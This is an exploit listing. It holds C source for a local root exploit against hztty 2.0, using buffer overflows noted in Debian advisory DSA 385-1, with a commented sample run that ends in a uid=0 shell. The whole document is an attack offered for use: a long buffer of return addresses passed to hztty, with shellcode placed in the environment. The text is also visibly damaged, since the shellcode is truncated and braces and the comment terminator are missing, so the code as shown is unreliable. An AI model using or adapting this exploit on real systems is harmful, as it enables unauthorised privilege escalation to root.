Local root exploit for hztty 2.0 that makes use of the buffer overflows discovered by Jens Steube.
/* 0x333hztty => hztty 2.0 local root exploit
* 21/09/2003 - 3:33 :>
* more info : Debian Security Advisory DSA 385-1
* *note* I adjusted some part of hztty's code since
* there were some errors. hope this will not influence
* exploitation :> tested against Red Hat 9.0 :
* [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
* [c0wboy@0x333 c0wboy]$ ./k
* --- local root exploit for hztty 2.0 ---
* --- coded by c0wboy ~ www.0x333.org ---
* no such module "���[...]����������[...]
* B`�
* sh-2.05b# [./hztty started] [using /dev/ttyp6]
* sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
* sh-2.05b#
* coded by c0wboy
* (c) 0x333 Outsiders Security Labs / www.0x333.org
#include <stdio.h>
#include <unistd.h>
#define BIN "./hztty"
#define SIZE 272
unsigned char shellcode[] =
"\xd2\xb0\x0b\xcd\x80" ;
int main()
int i;
char out[SIZE];
char *own[] = { shellcode, 0x0 };
int *hztty = (int *)(out);
int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);
for (i=0 ; i<SIZE-1 ; i+=4)
*hztty++ = ret;
hztty = 0x0;
fprintf (stdout, "\n --- local root exploit for hztty 2.0 ---\n");
fprintf (stdout, " --- coded by c0wboy ~ www.0x333.org ---\n\n");
execle (BIN, BIN, "-I", out, 0x0, own, 0x0);